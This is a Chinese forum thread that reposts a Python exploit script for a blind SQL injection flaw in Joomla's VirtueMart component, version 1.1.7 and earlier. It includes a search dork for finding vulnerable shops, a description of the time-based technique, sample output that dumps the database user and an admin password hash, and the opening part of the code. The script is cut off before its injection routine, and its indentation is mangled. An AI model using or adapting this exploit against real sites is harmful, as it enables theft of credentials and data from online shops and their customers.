网页资讯视频图片知道文库贴吧地图采购
进入贴吧全吧搜索
it一族吧 关注:31贴子:148
  • 1回复贴,共1

Joomla! v1.1.7 SQL最新盲注漏洞

只看楼主收藏回复

#!/usr/bin/python
#
# Joomla! com_virtuemart <= v1.1.7 Blind SQL Injection Exploit.
# Found by: TecR0c & mr_me
# Discovery date: 11/2/2011
# Code by: mr_me
# Vendor: http://virtuemart.net/
# Download: http://virtuemart.net/downloads
# Dork: inurl:"?option=com_virtuemart" > 46 million results
# Patch: http://dev.virtuemart.net/attachments/202/Patch-VirtueMart-1.1.7a.zip
# References:
# - http://www.stratsec.net/Research/Advisories/VirtueMart-SQL-Injection-(SS-2011-003)
# - http://virtuemart.net/security-bulletins/396-vm-security-bulletin-2011-02-18
#
# "The more you educate yourself the more you understand where things come from the more obvious things become
# and you begin to see lies everywhere. You have to know the truth and seek the truth and the truth will set you free."
# - zeitgeist addendum
#
# Description:
# ============
# With its fully-featured eCommerce engine, VirtueMart is perfect to sell your Goods online
# and drive your Business to new Heights. Despite being Open Source Software it powers large
# Online Shops providing the Performance, Usability and Security you expect from professional Software.
#
# Explantation:
# =============
# There is a Blind SQL Injection vulnerability in the "page" variable of the virtuemart component.
# Because of the fact that Joomla core filters '<' or '>' characters, we can only use '=' to test for true/false
# statements. This of course will send an enormous number of queries the target. During testing, 9145
# queries were sent to fully steal the admin user/hash. This PoC was tested on the latest version
# of virtuemart (1.1.7) at the time of discovery. Depending on your purpose, you may have to adjust the
# timings of benchmark and time to last byte (ttlb).
#
# Tested on Joomla v1.5.22 with virtuemart:
# ==========
# - v1.1.7
# - v1.1.6
# - v1.1.4
#
# [mr_me@pluto com_virtuemart]$ python virtuemart.py -p localhost:8080 -t 192.168.1.7 -d /webapps/joomla/
#
#   | ------------------------------------------------------------------- |
#   | Joomla! com_virtuemart <= v1.1.7 Remote Blind SQL Injection Exploit |
#   | by mr_me - net-ninja.net ------------------------------------------ |
#
# (+) PoC started on Sat Feb 12 17:26:15 2011
# (+) Exploiting target @: http://192.168.1.7/webapps/joomla/
# (+) Testing proxy @ localhost:8080.. proxy is found to be working!
# (+) Using time based SQL Injection.
# (+) This will take time, go grab a coffee..

IP属地:湖北1楼2011-04-11 21:03回复
    #
    # (!) Getting database version: 5.1.41-3ubuntu12.9
    # (!) Getting database user: root@localhost
    # (!) Getting database name: joomla
    # (!) Getting Joomla admin: admin:eb970f9dfca9d7353083ab37cf097e21:pL356HEW2hfl88NWuFpgjLDfy2gKwIHR
    # (+) PoC finished on Sat Feb 12 18:38:05 2011
    #
    import sys, urllib, urllib2, re, time
    from optparse import OptionParser
    # just printable ascii please
    lower_value = 32
    upper_value = 126
    vuluri = "index.php?option=com_virtuemart&page%3d-1"
    basicInfo = {'version':'@@version', 'user':'user()', 'name':'database()'}
    usage = "./%prog [<options>] -t [target] -d [directory]"
    usage += "\nExample: ./%prog -p localhost:8080 -t 192.168.1.7 -d /webapps/joomla/"
    parser = OptionParser(usage=usage)
    parser.add_option("-p", type="string",action="store", dest="proxy",
                       help="HTTP Proxy <server:port>")
    parser.add_option("-t", type="string", action="store", dest="target",
                       help="The Target server <server:port>")
    parser.add_option("-d", type="string", action="store", dest="directory",
                       help="Directory path to the CMS")
    (options, args) = parser.parse_args()
    def banner():
         print "\n\t| ------------------------------------------------------------------- |"
         print "\t| Joomla! com_virtuemart <= v1.1.7 Remote Blind SQL Injection Exploit |"
         print "\t| by mr_me - net-ninja.net ------------------------------------------ |\n"
    if len(sys.argv) < 4:
    banner()
    parser.print_help()
    sys.exit(1)
    def timer():
    now = time.localtime(time.time())
             return time.asctime(now)
    def testProxy():
    check = 1
    sys.stdout.write("(+) Testing proxy @ %s.. " % (options.proxy))
    sys.stdout.flush()
    try:
              req = urllib2.Request("http://www.google.com/")
       req.set_proxy(options.proxy,"http")
       check = urllib2.urlopen(req)
          except:
              check = 0
              pass
          if check != 0:
              sys.stdout.write("proxy is found to be working!\n")
              sys.stdout.flush()
          else:
              print "proxy failed, exiting.."
              sys.exit(1)
    
    IP属地:湖北2楼2011-04-11 21:03
    回复

      扫二维码下载贴吧客户端

      下载贴吧APP
      看高清直播、视频!
      • 1回复贴,共1
      发表回复
      发贴请遵守贴吧协议及“七条底线”贴吧投诉
      内  容:
        查看全部
      发 表
      保存至快速回贴